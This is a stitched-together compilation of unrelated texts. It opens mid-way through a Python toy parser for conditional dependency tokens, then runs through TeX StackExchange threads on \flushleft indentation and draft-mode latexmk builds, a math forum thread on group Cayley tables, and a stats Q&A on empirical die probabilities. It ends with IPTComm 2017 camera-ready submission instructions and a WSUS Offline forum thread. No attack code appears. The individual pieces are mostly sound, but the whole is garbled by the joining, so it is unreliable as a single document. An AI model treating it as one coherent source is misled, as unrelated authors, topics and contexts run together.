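        if tok.endswith("?"):               # conditional group follows: flag? ( ... )
            enabled = tok[:-1] in uselist
            assert tokens[i + 1] == "("
            j = tokens.index(")", i + 2)    # no nesting in this toy version
            if enabled:
                out.extend(tokens[i + 2:j])
            i = j + 1
        else:
            out.append(tok)
            i += 1
    return out

print(toy_use_reduce("base doc? ( docs-pkg ) extra", uselist={"doc"}))
# -> ['base', 'docs-pkg', 'extra']
print(toy_use_reduce("base doc? ( docs-pkg ) extra"))
# -> ['base', 'extra']
```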
http://tex.stackexchange.com/questions/85837/paragraphs-not-automatically-indenting?answertab=votes
# paragraphs not automatically indenting

With the following code my paragraphs aren't automatically indenting... I'm confused as to why, because I've done a decent bit of LaTeXing before with very similar packages and with the same article class, yet it's always done it for me automatically after two returns. Here's the .tex file code:

\documentclass[12pt]{article}
\usepackage{graphicx}
\usepackage{amssymb}
\usepackage[greek,english]{babel}
\usepackage{color}
\usepackage{listings}
\usepackage{float}

\begin{document}

\flushleft{
name\\
class\\
12.11.12\\
}

\subsection*{Introduction}

test

sakdfhaijsfdhkjsf

\end{document}

I'm sure I'm missing something obvious. I know the first paragraph won't indent, but as to why the second two don't I have no idea. They get a newline but no indent. Any help would be much appreciated, thanks.

- Perhaps you could edit your question so as to make the title more explicit, now that an answer has been found. –  ienissei Dec 7 '12 at 8:04

\flushleft is not a command that takes arguments. The way you have it written, everything (the entire document) after the command is flushed left. To get what you want you should write the following

{\flushleft
name\\
class\\
12.11.12}

\section*{Radix Trees}

that is, set the command and the text to be flushed within curly braces.

- Awesome, thanks very much! –  Noah Dec 6 '12 at 18:35
- @Noah Notice that I took the liberty and improved the code a bit more. –  tohecz Dec 6 '12 at 18:39
- And please notice that instead of \flushleft, the command \noindent could be used here, because in this case, the only effect of \flushleft is suppressing the indentation. –  tohecz Dec 6 '12 at 18:39
- Don't use \flushleft by itself; in this application use either \raggedright (with a finishing \par before the closing brace) or enclose the text in the flushleft environment (which adds some space above and below it). –  egreg Dec 6 '12 at 18:55
- @egreg, \begin{flushleft} calls \flushleft inside a brace group, so the space inserted above will be exactly the same. Still, it is of course better to delimit the scope of flushleft by calling it as an environment (which also ensures that \endflushleft will be called, if it exists, for spacing below). –  alexis Dec 6 '12 at 21:14

As others have commented, \flushleft is not a command with arguments (like, for instance, \textbf or \emph). Actually \flushleft is not a user command at all. It exists only for internal reasons, for making the flushleft environment work.

You have many possibilities for setting the author data for a document that seems not to require the full-fledged \maketitle. In what follows I assume that code snippets are preceded by your preamble (slightly modified)

\documentclass[12pt]{article}
\usepackage[greek,english]{babel}
\usepackage{graphicx}
\usepackage{amsmath,amssymb}
\usepackage{color}
\usepackage{listings}
\usepackage{float}
\setcounter{secnumdepth}{-2} % no section number

## First way

\begin{document}

\noindent name

\noindent class

\noindent date

## Second way

Here the result is the same as in the preceding way, but the code is more compact

\begin{document}

{\raggedright
name \\
class \\
date \\
}

## Third way

This may add some space below the data. Ordinarily, the flushleft environment adds also vertical space above it, but here we are at the top of a page, so this space will be discarded. Actually, also the space below will not be added in this case, because a section title follows and LaTeX chooses the maximum between the predefined spaces below the environment and above the section title.
\begin{document}

\begin{flushleft}
name \\
class \\
date
\end{flushleft}

## Fourth (and preferred) way

\newcommand{\authordata}[3]{{\raggedright #1\\#2\\#3\par}}

\begin{document}

\authordata{name}{class}{date}

This way abstracts the input of the data, so you're free to change how it will appear by just changing the definition. For instance, a simple addition of \large\bfseries will make the data more prominent:

\newcommand{\authordata}[3]{{\large\bfseries\raggedright #1\\#2\\#3\par}}

Many variations are possible, without ever touching what is after \begin{document}.
https://tex.stackexchange.com/questions/212657/compile-a-document-as-draft-for-the-first-few-times-and-then-non-draft-in-the
# Compile a document as “draft” for the first few times and then non-draft in the final round

I'm working on a big document in which there are many images. Usually, I compile it with latexmk and it works quite well. But: with all these images it's quite slow when compiling.

Is it somehow possible to compile it as a draft for the first few rounds and then as a non-draft, so the images are ignored the first few times and properly included in the last round, without editing the file in between? That would save quite a lot of time.

• arara should be the right tool for this, right @PauloCereda? – percusse Nov 17 '14 at 19:53
• Have you tried the `draft` option to `\includegraphics`? – sgmoye Nov 17 '14 at 20:57
• I don't see how the `\includegraphics`-`draft` would help me here. Before compiling the last time, I'd need to remove that code part again. My idea is to run everything in draft-mode except for the last run or so. And I have never heard of arara, how would that help me here? thanks. – Perik Onti Nov 17 '14 at 21:18
• @PerikOnti `draft` may change several aspects of the typesetting, depending on which packages you load, so just the final run without it may not be sufficient. The `draft` option should be given only to `graphicx`. It's an interesting question anyway. – egreg Nov 17 '14 at 22:11
• do you mean you are running latex multiple times after each edit? if so why? If you are editing between latex runs why is adding/removing `[draft]` a problem? – David Carlisle Nov 17 '14 at 22:11

Note that `latexmk` can't know which LaTeX run will be the last, so you will need to run it twice. The first time call it like

```
latexmk -pdf -pdflatex="pdflatex %O '\PassOptionsToPackage{draft}{graphicx}\input{%S}'" <filename>
```

and the second time just with

```
latexmk -pdf -g <filename>
```

In the document you'll just have `\usepackage{graphicx}`. In my test, just one run is performed with the second command.
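Since this recipe always takes the same two invocations, it can be wrapped in a small shell function. This is a sketch, assuming latexmk and pdflatex are on the PATH; the LATEXMK override is a hypothetical hook that exists purely so the function can be exercised without a TeX installation:

```shell
# Hypothetical two-pass wrapper around the commands from the answer above.
draftbuild() {
    target="${1:?usage: draftbuild file.tex}"
    # Draft passes: graphicx's draft option boxes out images, so runs are fast.
    ${LATEXMK:-latexmk} -pdf \
        -pdflatex="pdflatex %O '\PassOptionsToPackage{draft}{graphicx}\input{%S}'" \
        "$target"
    # Final pass: -g forces one more run, now with images actually included.
    ${LATEXMK:-latexmk} -pdf -g "$target"
}
```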
http://mathhelpforum.com/advanced-algebra/153767-inverse-element-group.html
# Math Help - Inverse of an element in a group

1. ## Inverse of an element in a group

Let $G$ be a group. Then (a) $G$ has a unique identity, and (b) each element in $G$ has a unique inverse.

The table below shows an abelian group with $3$ elements:

$\begin{tabular}{lccr} *&a&b&c\\ \cline{2-4}a&a&b&c\\ b&b&c&c\\ c&c&a&b \end{tabular}$

I can see the identity is shown in the first row and column, but I don't see the inverse of each element. Does it mean that the inverses are not in the group?

2. Originally Posted by novice
(b) each element in $G$ has a unique inverse.
You are correct: not every element here has an inverse, therefore $G$ is not a group.

3. Originally Posted by novice
The table below shows an abelian group with $3$ elements: $\begin{tabular}{lccr} *&a&b&c\\ \cline{2-4}a&a&b&c\\ b&b&c&c\\ c&c&a&b \end{tabular}$
Also $bc \neq cb \implies G$ does not commute.

4. Let $G$ be a group. Would it look like this: $G=\{e, 1/a, a, 1/b, b,\dots\}$ provided that $G$ is associative and commutative?

5. Originally Posted by novice
Let $G$ be a group. Would it look like this: $G=\{e, 1/a, a, 1/b, b,\dots\}$ provided that $G$ is associative and commutative?
I don't think so, as $a=e$ and the inverses $a^{-1},b^{-1}, c^{-1}$ are not listed in the make-up. You would need a rule linking the other elements.

6. Originally Posted by novice
Let $G$ be a group. Would it look like this: $G=\{e, 1/a, a, 1/b, b,\dots\}$ provided that $G$ is associative and commutative?
A group $(G, *)$ is always associative by definition, but not always commutative. It is commutative if and only if it is abelian, by definition. In general the inverse of $a$ is denoted $a^{-1}$. Also keep in mind that it's possible to have $a=a^{-1}$, so your enumeration of the set above could have duplicates. There would also be duplicates if you listed a pair of inverses twice, for example if $a = b^{-1}$.

7. I see. No wonder $a*b=b$.

8. Originally Posted by undefined
In general the inverse of $a$ is denoted $a^{-1}$. Also keep in mind that it's possible to have $a=a^{-1}$, so your enumeration of the set above could have duplicates. There would also be duplicates if you listed a pair of inverses twice, for example if $a = b^{-1}$.
So if $G$ is a group, the inverse of each element is in $(G,*)$, where the product of each element and its inverse is $e$, the identity of $(G,*)$. Yah?

9. Yes, by definition of a group.

10. Originally Posted by novice
Let $G$ be a group. Then (a) $G$ has a unique identity, and (b) each element in $G$ has a unique inverse. The table below shows an abelian group with $3$ elements: $\begin{tabular}{lccr} *&a&b&c\\ \cline{2-4}a&a&b&c\\ b&b&c&c\\ c&c&a&b \end{tabular}$ I can see the identity is shown in the first row and column, but I don't see the inverse of each element. Does it mean that the inverses are not in the group?
A quick check to see that this is not a group is to note that in each row and column of the Cayley table every element must occur. This reflects the fact that one can get from each element of a group to every other; for example one can get to $c$ from $a$ by (post-)multiplying $a$ by $a^{-1}c$.
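The row-and-column check from the last post is easy to run mechanically: a finite table can only be a group table if every row and every column is a permutation of the elements (a Latin square). A small self-contained sketch; the dictionary encoding and the Z/3Z comparison table are my own, not from the thread:

```python
def is_latin_square(table):
    """table: dict mapping (x, y) -> x*y over a finite element set."""
    elems = {x for x, _ in table}
    rows_ok = all({table[(x, y)] for y in elems} == elems for x in elems)
    cols_ok = all({table[(x, y)] for x in elems} == elems for y in elems)
    return rows_ok and cols_ok

elements = "abc"
question_table = {  # the table from the original post; 'c' repeats in row b
    ("a", "a"): "a", ("a", "b"): "b", ("a", "c"): "c",
    ("b", "a"): "b", ("b", "b"): "c", ("b", "c"): "c",
    ("c", "a"): "c", ("c", "b"): "a", ("c", "c"): "b",
}
z3_table = {  # Z/3Z written multiplicatively: a=0, b=1, c=2 under addition mod 3
    (x, y): elements[(elements.index(x) + elements.index(y)) % 3]
    for x in elements for y in elements
}

print(is_latin_square(question_table))  # False -> cannot be a group
print(is_latin_square(z3_table))        # True
```

Note the check is necessary but not sufficient: a Latin square still need not be associative, so passing it does not prove the table is a group.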
https://stats.stackexchange.com/questions/198278/error-of-empirical-probability-for-unfair-die?noredirect=1
# Error of empirical probability for unfair die

I roll an unfair $256$-sided die $n$ times ($n > 1'000'000$) and count the rolled numbers in a histogram. I then calculate the empirical probabilities ${p_e}_i$ for $i=1, \dots, 256$ by taking the histogram values divided by $n$.

What is the expected error $e = E(({p_e}_i - {p_t}_i)^2)$, where ${p_t}_i$ is the unknown true probability of landing with side $i$ facing up? If it matters, you can assume that $0.5 / 256 < {p_t}_i < 2 / 256$.

There is a related question, but applying the answer gives me nonsensical results (such as the error increasing with $n$ when it should be decreasing). I expect the convergence ${p_e}_i \to {p_t}_i$ and $e \to 0$ for $n \to \infty$.

In general, for a random variable $X$ with $\sigma^2 \equiv \text{Var}(X)$, the sample mean $\bar{X}$ has variance $\sigma^2 / n$ when our samples are uncorrelated (this follows from the basic properties of variance). In our case $X$ follows a Bernoulli distribution with some success probability $p$ (the chance that the given side comes up after we roll the die) and this distribution has variance $p (1 - p)$ (to see this simply note that $\text{Var}(X) = \text{E}(X^2) - \text{E}(X)^2 = p - p^2 = p(1 - p)$ since $X = X^2$), so the sample proportion has variance $p(1 - p) / n$.

However, we don't know what $p$ is, but we can use the fact that $p(1 - p)$ increases over $[0, 1/2)$ along with your condition to get the following upper bound
\begin{align} \text{Var} (\bar{X}) &\leq \frac{2/256(1 - 2/256)}{n} \\ &= \frac{508}{65536 n} . \end{align}
You can use this idea to choose $n$ so as to guarantee that the variance is smaller than any $\epsilon > 0$ you like.

• Since all the true probabilities are known and small, this would seem to be a gross overestimate. – whuber Feb 24 '16 at 19:48
• @whuber I think the original post indicates the probabilities aren't known except that they're within some range. – dsaxton Feb 24 '16 at 20:48
• (+1) Ah, I see you're right--I skimmed over that crucial word "unknown" in the question! – whuber Feb 24 '16 at 21:47
• I have been trying to apply your answer, but something doesn't work out. Say I want to know $p$ with an error of $\sqrt{\text{Var}(\bar{X})} = 0.01$. Solving for $n$ gives $n=10000 \cdot {508 \over 65536} = 77.5$. Approximating the probability of each side of a $256$-sided die with an expected error of $<0.01$ in $78$ rolls is impossible. What did I do wrong? – nwp Feb 25 '16 at 17:12
• I'm not sure how you got that value for $n$, but notice by looking at the upper bound that the variance is always smaller than $0.01$. For fixed $\epsilon$ solve the inequality $508 / 65536n \leq \epsilon$ for $n$ to get an appropriate sample size that bounds the variance from above by $\epsilon$. – dsaxton Feb 25 '16 at 17:25

Let $p$ be the specific $p_i$. The probability estimated is just the number of $i$'s over $n$, so $p_{ei}$ is just $n_{ei} / n$:
$$E( ( p_{ei} - p_{ti} )^2 ) = E( ( n_{ei} / n - p )^2 )$$
Multiply inside by $n^2$ and outside by $1/n^2$:
$$E( ( p_{ei} - p_{ti} )^2 ) = \frac{1}{n^2} \cdot E( ( n \cdot n_{ei} / n - n \cdot p )^2 )$$
The number observed $n_{ei}$ follows the binomial distribution:
$$E( ( p_{ei} - p_{ti} )^2 ) = \frac{1}{n^2} \cdot \sigma_{binomial}^2$$
$$\sigma_{binomial}^2 = n p(1-p)$$
$$E( ( p_{ei} - p_{ti} )^2 ) = \frac{1}{n^2} \cdot n p (1-p)$$
$$E( ( p_{ei} - p_{ti} )^2 ) = \frac{p(1-p)}{n}$$

• It seems you begin with such a strong simplifying assumption that the answer becomes almost trivial. Presumably, by indexing the probabilities the question wants to address the case where they substantially vary. Did I misunderstand what you mean by "let $p$ be the specific $p_i$"? – whuber Feb 24 '16 at 19:39
• Ahhh, yes I was just calculating it for some $p_i$ which I denoted $p$ for simplicity. But if the question is the expected value over all the $p_{ei}-p_{ti}$'s then I think it would just be the weighted average of $p_i(1-p_i)/n_i$ where $n_i$ is the number of times the value $i$ came up and $p_i$ is the real probability thereof. – MikeP Feb 24 '16 at 20:49
• I'm not sure myself. I did notice there is no summation in the question, suggesting this problem may reduce to a straightforward Binomial calculation, as you point out. Maybe @nwp will clear this up for us with a comment or edit. – whuber Feb 24 '16 at 21:48
• @whuber There is no summation besides counting the rolls in the histogram. I suppose one could look at a specific die side, model the probability through a binomial distribution and arrive at $e = {p(1-p) \over n}$. Can I use the experimental ${p_e}_i$ instead of the true ${p_t}_i$ for that? If so this would be the answer. I do feel like information is lost by not using $\sum_{i=1}^{256} {p_e}_i = \sum_{i=1}^{256} {p_t}_i = 1$, but it should be close enough. – nwp Feb 24 '16 at 22:05
• Actually, no information is lost at all. This is because expectations are linear. By trying to use the experimental value you would be substantially changing your question. Currently, you are asking for a mathematical result: the expectation of a specified random variable (which happens to have a Binomial distribution). (The answer would, of course, be expressed in terms of the unknown probability.) By using the empirical probability you would turn it into a statistical question: how to estimate the expectation. Either form of the question has many answers elsewhere on this site. – whuber Feb 24 '16 at 22:08
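The closed form $e = p(1-p)/n$ for a single side is easy to sanity-check by simulation. A sketch with an assumed true probability inside the stated range; the particular values of p, n, and the trial count are illustrative:

```python
import random

random.seed(0)

p = 1.5 / 256      # assumed true probability for one side, within (0.5/256, 2/256)
n = 20_000         # rolls per experiment
trials = 200       # experiments used to estimate the expectation

# Each trial: roll n times, record the squared error of the empirical probability.
sq_errors = []
for _ in range(trials):
    hits = sum(random.random() < p for _ in range(n))
    sq_errors.append((hits / n - p) ** 2)

mse = sum(sq_errors) / trials   # simulated E[(pe - pt)^2]
theory = p * (1 - p) / n        # p(1-p)/n from the derivation above
print(f"simulated: {mse:.3g}  theory: {theory:.3g}")
```

With only 200 trials the Monte Carlo estimate is good to roughly ±10%, so expect agreement in magnitude rather than in digits.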
http://iptcomm.org/camera-ready.html
#### Due date: Tuesday, Sep 5 2017

Step 1. All authors of accepted papers must prepare camera-ready versions and a copyright form as outlined below. Camera-ready papers must be checked through IEEE PDF eXpress. Instructions on this are given below. The camera-ready papers and signed copyright form MUST be uploaded to the EDAS IPTComm website by Tuesday, Sep-05-2017. If you run into any problems, please contact tpc@iptcomm.org and chair@iptcomm.org.

The LaTeX and MS Word templates for the camera-ready papers are at http://origin.www.ieee.org/conferences_events/conferences/publishing/templates.html

Step 2. All authors must include a copyright clearance code at the bottom of the first page of the camera-ready paper. The copyright code should be one of the following four, depending on the domicile of the authors:

• For papers in which all authors are employed by the US government, the copyright notice is: U.S. Government work not protected by U.S. copyright
• For papers in which all authors are employed by a Crown government (UK, Canada, and Australia), the copyright notice is: 978-1-5386-1322-1/17/$31.00 ©2017 Crown
• For papers in which all authors are employed by the European Union, the copyright notice is: 978-1-5386-1322-1/17/$31.00 ©2017 European Union
• For all other papers the copyright notice is: 978-1-5386-1322-1/17/$31.00 ©2017 IEEE

LaTeX users can add the following lines for the copyright notice to show up:

\IEEEoverridecommandlockouts
\IEEEpubid{\makebox[\columnwidth]{978-1-5386-1322-1/17/\$31.00~\copyright{}2017 IEEE \hfill}
  \hspace{\columnsep}\makebox[\columnwidth]{ }}

MS Word users can use "Insert" + "Text box", insert the appropriate copyright notice in the text box, and place the box (without border) at the bottom left of the first page.

Step 3. Authors must fill out the IEEE copyright form. This form must be uploaded to the IPTComm EDAS website along with the camera-ready paper.

Step 4. All camera-ready papers MUST pass the IEEE PDF eXpress check.
Please go to IEEE PDF eXpress and create an account if you do not have one. The Conference ID to use for IPTComm 2017 is: 41601X. Please make sure that PDF eXpress does not issue any errors for your camera-ready manuscript. Instructions on using PDF eXpress are provided by IEEE on the IEEE PDF eXpress page referenced above.

Step 5. The camera-ready paper and signed copyright form MUST be uploaded to the IPTComm EDAS website by Tue, Sep-05-2017 to be included in the IEEE Xplore proceedings. If you have any questions or run into problems, please contact tpc@iptcomm.org or chair@iptcomm.org.
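For LaTeX users, the Step 2 notice lines slot into the preamble of the standard IEEEtran template; a minimal, hypothetical skeleton (the title and author are placeholders, and the notice shown is the variant for non-government authors):

```latex
\documentclass[conference]{IEEEtran}

% Copyright notice from Step 2 (version for "all other papers").
\IEEEoverridecommandlockouts
\IEEEpubid{\makebox[\columnwidth]{978-1-5386-1322-1/17/\$31.00~\copyright{}2017 IEEE \hfill}
  \hspace{\columnsep}\makebox[\columnwidth]{ }}

\begin{document}

\title{Camera-Ready Paper Title}
\author{\IEEEauthorblockN{Author Name}}
\maketitle

% The notice is emitted on the first page only; body text follows as usual.

\end{document}
```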
http://forums.wsusoffline.net/viewtopic.php?f=9&t=2053&start=10&view=print
Page 2 of 2

### Re: CreateIsoImage.sh excludes the dotnet 4.0 files.

Posted: 09.09.2011, 06:59
I think that can fix the problem (I haven't tried it yet, but it seems logical). The only thing missing was the dotnet installer (previously I forgot to check inside the dotnet/glb folder, so sorry for that). How can I check which build I am running? The only thing it tells me is that I am running v6.9. Also, how do I download the latest version from trac (I have never worked with trac before, only with git and mercurial)?

### Re: CreateIsoImage.sh excludes the dotnet 4.0 files.

Posted: 09.09.2011, 09:16

### Re: CreateIsoImage.sh excludes the dotnet 4.0 files.

Posted: 09.09.2011, 09:37
An additional hint: after downloading the trunk, you should do the preparatory steps described at the beginning of this thread. This is mainly for compiling the AutoIt scripts. However, the batch files for doing so are for Windows.

### Re: CreateIsoImage.sh excludes the dotnet 4.0 files.

Posted: 09.09.2011, 18:59
The AutoIt scripts are only for Windows, I think.

### Re: CreateIsoImage.sh excludes the dotnet 4.0 files.

Posted: 09.09.2011, 23:53
Sure, but at least the Update Installer must be compiled, because it is used for updating Windows later on.

### Re: CreateIsoImage.sh excludes the dotnet 4.0 files.

Posted: 11.09.2011, 11:23
Correct.

### Re: CreateIsoImage.sh excludes the dotnet 4.0 files.

Posted: 12.09.2011, 10:30
You don't need to compile anything, just replace all files in your \exclude subdirectory with the corresponding files from the trunk build.